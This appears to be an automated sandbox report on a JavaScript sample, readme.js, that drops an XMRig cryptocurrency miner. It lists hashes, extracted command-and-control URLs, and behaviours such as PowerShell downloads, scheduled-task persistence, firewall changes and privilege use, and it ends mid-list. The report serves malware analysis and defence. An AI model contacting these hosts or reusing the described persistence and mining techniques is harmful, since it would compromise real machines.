Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
18-02-2021 18:36
Static task
static1
Behavioral task
behavioral1
Sample
readme.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
readme.js
Resource
win10v20201028
General
-
Target
readme.js
-
Size
9KB
-
MD5
e294d6f427c64f77b5b61bb7b17dd12c
-
SHA1
ccdae3ada854cc441106ec52c12823439bab6cba
-
SHA256
9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
-
SHA512
2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a
Malware Config
Extracted
http://t.zz3r0.com
Extracted
http://t.zer9g.com
Extracted
http://t.bb3u9.com
Extracted
http://t.bb3u9.com
Signatures
-
XMRig Miner Payload 5 IoCs
Processes:
resource yara_rule C:\Windows\TEMP\m6.bin.ori xmrig \Windows\Temp\m6.bin.exe xmrig C:\Windows\Temp\m6.bin.exe xmrig C:\Windows\Temp\m6.bin.exe xmrig \Windows\Temp\m6.bin.exe xmrig -
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.EXEflow pid process 6 1180 powershell.exe 18 2628 powershell.EXE 22 2740 powershell.EXE 24 2740 powershell.EXE 38 2644 powershell.EXE 40 2644 powershell.EXE 41 2628 powershell.EXE 42 2628 powershell.EXE -
Executes dropped EXE 4 IoCs
Processes:
biJkcCEA.exebiJkcCEA.exebiJkcCEA.exem6.bin.exepid process 3068 biJkcCEA.exe 1564 biJkcCEA.exe 2788 biJkcCEA.exe 1776 m6.bin.exe -
Modifies Windows Firewall 1 TTPs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 11 IoCs
Processes:
cmd.exeWerFault.execmd.exetaskmgr.exepid process 1488 cmd.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3036 cmd.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe 1340 taskmgr.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 47 api.ipify.org 48 api.ipify.org -
Drops file in System32 directory 64 IoCs
Processes:
powershell.EXEpowershell.EXEbiJkcCEA.exebiJkcCEA.exepowershell.EXEpowershell.EXEbiJkcCEA.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_321ea8af-0de6-4c9d-bd76-484c8512c028 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e powershell.EXE File created C:\Windows\System32\Windowspowershell\V1.0\biJkcCEA.exe powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79c2aacf-8393-4f52-b7a6-7a01c51aceb7 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e28224f3-d2f8-4dde-be40-718da8c29e31 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_874f5106-2e38-489f-a5ef-3e78b7fa0687 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f85e173b-52d6-4068-8626-a1834d4344c8 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1b650a3b-43f8-4dbe-bcfa-c2f732a5dbd7 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c648cf66-c511-4b80-ae4e-74466b508812 powershell.EXE File opened for modification C:\Windows\System32\Windowspowershell\V1.0\biJkcCEA.exe powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1ada7a34-ebaa-466b-9476-a49136c3a364 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_75287e78-b351-47c9-9710-fd4060b9783e biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_321ea8af-0de6-4c9d-bd76-484c8512c028 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1fd9701d-c1a6-42d1-99eb-aa9cdd73a618 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_15f91d8a-a973-4e13-80c0-c9070d7a2e9f biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_00738f41-a64b-4342-bb3a-4603ca81b610 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 biJkcCEA.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dadbe248-c083-4a79-9d72-f079e632d697 powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_84c00e54-c139-4043-9787-5c89bfd719f4 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11bee23b-dca9-446d-8d55-0583d33a8102 biJkcCEA.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc680f19-cfc6-4ba8-bb36-6144348b1d62 biJkcCEA.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3908 2788 WerFault.exe biJkcCEA.exe -
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2072 schtasks.exe 2112 schtasks.exe 2072 schtasks.exe 2584 schtasks.exe 2524 schtasks.exe 2584 schtasks.exe -
Gathers network information 2 TTPs 4 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeNETSTAT.EXENETSTAT.EXEipconfig.exepid process 2476 ipconfig.exe 1156 NETSTAT.EXE 3288 NETSTAT.EXE 2128 ipconfig.exe -
Modifies data under HKEY_USERS 52 IoCs
Processes:
biJkcCEA.exebiJkcCEA.exepowershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs biJkcCEA.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust biJkcCEA.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80da078c2506d701 powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs biJkcCEA.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs biJkcCEA.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs biJkcCEA.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs biJkcCEA.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople biJkcCEA.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 896 notepad.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.EXEpowershell.EXEpowershell.EXEbiJkcCEA.exebiJkcCEA.exebiJkcCEA.exepowershell.EXEpowershell.exeWerFault.exepid process 1180 powershell.exe 1180 powershell.exe 2376 powershell.EXE 2376 powershell.EXE 2628 powershell.EXE 2628 powershell.EXE 2740 powershell.EXE 2740 powershell.EXE 3068 biJkcCEA.exe 3068 biJkcCEA.exe 2788 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 2788 biJkcCEA.exe 2644 powershell.EXE 2644 powershell.EXE 2420 powershell.exe 2420 powershell.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 3908 WerFault.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe 1564 biJkcCEA.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1180 powershell.exe Token: SeIncreaseQuotaPrivilege 1092 WMIC.exe Token: SeSecurityPrivilege 1092 WMIC.exe Token: SeTakeOwnershipPrivilege 1092 WMIC.exe Token: SeLoadDriverPrivilege 1092 WMIC.exe Token: SeSystemProfilePrivilege 1092 WMIC.exe Token: SeSystemtimePrivilege 1092 WMIC.exe Token: SeProfSingleProcessPrivilege 1092 WMIC.exe Token: SeIncBasePriorityPrivilege 1092 WMIC.exe Token: SeCreatePagefilePrivilege 1092 WMIC.exe Token: SeBackupPrivilege 1092 WMIC.exe Token: SeRestorePrivilege 1092 WMIC.exe Token: SeShutdownPrivilege 1092 WMIC.exe Token: SeDebugPrivilege 1092 WMIC.exe Token: SeSystemEnvironmentPrivilege 1092 WMIC.exe Token: SeRemoteShutdownPrivilege 1092 WMIC.exe Token: SeUndockPrivilege 1092 WMIC.exe Token: SeManageVolumePrivilege 1092 WMIC.exe Token: 33 1092 WMIC.exe Token: 34 1092 WMIC.exe Token: 35 1092 WMIC.exe Token: SeIncreaseQuotaPrivilege 1564 WMIC.exe Token: SeSecurityPrivilege 1564 WMIC.exe Token: SeTakeOwnershipPrivilege 1564 WMIC.exe Token: SeLoadDriverPrivilege 1564 WMIC.exe Token: SeSystemProfilePrivilege 1564 WMIC.exe Token: SeSystemtimePrivilege 1564 WMIC.exe Token: SeProfSingleProcessPrivilege 1564 WMIC.exe Token: SeIncBasePriorityPrivilege 1564 WMIC.exe Token: SeCreatePagefilePrivilege 1564 WMIC.exe Token: SeBackupPrivilege 1564 WMIC.exe Token: SeRestorePrivilege 1564 WMIC.exe Token: SeShutdownPrivilege 1564 WMIC.exe Token: SeDebugPrivilege 1564 WMIC.exe Token: SeSystemEnvironmentPrivilege 1564 WMIC.exe Token: SeRemoteShutdownPrivilege 1564 WMIC.exe Token: SeUndockPrivilege 1564 WMIC.exe Token: SeManageVolumePrivilege 1564 WMIC.exe Token: 33 1564 WMIC.exe Token: 34 1564 WMIC.exe Token: 35 1564 WMIC.exe Token: SeIncreaseQuotaPrivilege 1664 WMIC.exe Token: SeSecurityPrivilege 1664 WMIC.exe Token: SeTakeOwnershipPrivilege 1664 WMIC.exe Token: SeLoadDriverPrivilege 1664 WMIC.exe Token: SeSystemProfilePrivilege 1664 WMIC.exe Token: SeSystemtimePrivilege 1664 WMIC.exe Token: SeProfSingleProcessPrivilege 1664 WMIC.exe Token: SeIncBasePriorityPrivilege 1664 WMIC.exe Token: SeCreatePagefilePrivilege 1664 WMIC.exe Token: SeBackupPrivilege 1664 WMIC.exe Token: SeRestorePrivilege 1664 WMIC.exe Token: SeShutdownPrivilege 1664 WMIC.exe Token: SeDebugPrivilege 1664 WMIC.exe Token: SeSystemEnvironmentPrivilege 1664 WMIC.exe Token: SeRemoteShutdownPrivilege 1664 WMIC.exe Token: SeUndockPrivilege 1664 WMIC.exe Token: SeManageVolumePrivilege 1664 WMIC.exe Token: 33 1664 WMIC.exe Token: 34 1664 WMIC.exe Token: 35 1664 WMIC.exe Token: SeIncreaseQuotaPrivilege 1172 WMIC.exe Token: SeSecurityPrivilege 1172 WMIC.exe Token: SeTakeOwnershipPrivilege 1172 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
